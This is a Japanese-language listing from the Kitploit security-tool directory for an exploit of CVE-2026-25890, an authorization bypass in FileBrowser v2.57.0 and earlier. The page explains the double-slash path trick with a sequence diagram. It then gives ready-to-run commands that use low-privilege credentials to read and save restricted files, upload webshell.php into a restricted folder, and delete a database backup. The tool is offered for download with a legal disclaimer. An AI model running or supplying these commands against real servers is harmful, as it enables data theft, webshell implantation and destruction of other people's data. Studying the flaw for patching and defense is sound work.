Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-25890-FileBrowser-Access-Control-Bypass — CVE-2026-25890 のエクスプロイト。FileBrowser <= v2.57.0 におけるパスベースの認可バイパスであり、認証済みの低権限ユーザーが複数の先頭スラッシュを介して制限されたファイルの読み取り、アップロード、削除を可能にします。 | Kitploit
ツール/GitHubGitHub/mbanyamer/cve-2026-25890-filebrowser-access-control-bypass
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmbanyamer/cve-2026-25890-filebrowser-access-control-bypass

CVE-2026-25890-FileBrowser-Access-Control-Bypass

CVE-2026-25890 のエクスプロイト。FileBrowser <= v2.57.0 におけるパスベースの認可バイパスであり、認証済みの低権限ユーザーが複数の先頭スラッシュを介して制限されたファイルの読み取り、アップロード、削除を可能にします。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-25890 - FileBrowser アクセス制御バイパス

Author GitHub license Python version CVE Exploit-DB Tested on

未認証ユーザーはこの脆弱性を悪用できません — ターゲットパスへのアクセスが制限された有効な低権限資格情報が必要です。

FileBrowser ≤ v2.57.0 におけるパスベースの認可バイパス。複数の先頭スラッシュ(/private の代わりに //private)を使用して strings.HasPrefix() チェックを回避しつつ、ファイルシステムは正規化されたパスを提供します。

v2.57.1 で修正済み(コミット 489af403... – を削除)。

r.SkipClean(true)

📦 機能

  • 制限されたファイルの読み取り
  • 制限されたディレクトリへのファイルアップロード
  • 制限されたファイルの削除
  • バイパステスト用の先頭スラッシュ数のカスタマイズ
  • 漏えいしたファイルのローカル保存
  • 詳細なコンテンツプレビュー
  • argparse によるクリーンな CLI

🛠️ インストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# 標準ライブラリ + requests 以外の依存関係は不要
pip install requests

🚀 使用方法

root@kitploit:~
python3 exploit.py --help

基本的な例

root@kitploit:~
# 制限されたファイルの読み取り
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
root@kitploit:~
# 制限されたフォルダへの悪意のあるファイルのアップロード
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
root@kitploit:~
# 制限されたファイルの削除
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4

📊 PoC 攻撃フロー

root@kitploit:~
sequenceDiagram
    participant Attacker
    participant FileBrowser ≤ v2.57.0
    participant Gorilla Mux Router
    participant Auth Middleware
    participant Filesystem Handler

    Attacker->>FileBrowser: GET /api/resources/private/secret.txt<br>(通常リクエスト)
    FileBrowser->>Gorilla Mux: Path = /api/resources/private/secret.txt
    Gorilla Mux->>Auth Middleware: path = "/private/secret.txt"
    Auth Middleware->>Auth Middleware: strings.HasPrefix("/private/secret.txt", disallowed="/private") → true
    Auth Middleware->>Attacker: 403 Forbidden

    Note over Attacker,FileBrowser: 攻撃者がバイパスを試行

    Attacker->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Path = /api/resources//private/secret.txt<br>(SkipClean=true → 正規化なし)
    Gorilla Mux->>Auth Middleware: path = "//private/secret.txt"
    Auth Middleware->>Auth Middleware: HasPrefix("//private/secret.txt", "/private") → false
    Auth Middleware->>Filesystem Handler: 許可 → 続行
    Filesystem Handler->>Filesystem: // を /private/secret.txt に正規化
    Filesystem->>Filesystem Handler: ファイル内容を返す
    Filesystem Handler->>Attacker: 200 OK + 秘密の内容

⚠️ 法的・倫理的免責事項

この概念実証は教育およびセキュリティ研究目的のみで提供されています。
所有者からの明示的な書面による許可なしに、いかなるシステムに対してもこのコードを使用しないでください。
システムへの不正アクセスまたは改変は、ほとんどの法域(例: CFAA、Computer Misuse Act)で違法です。

📜 参考情報

  • GitHub Advisory GHSA-4mh3-h929-w968
  • 修正コミット
  • リリース v2.57.1

❤️ クレジット

エクスプロイト作者: Mohammed Idrees Banyamer
国: ヨルダン
Instagram: @banyamer_security

役に立った場合はリポジトリにスター ⭐ を付けてください!


最終更新: 2026年2月

ツールをダウンロード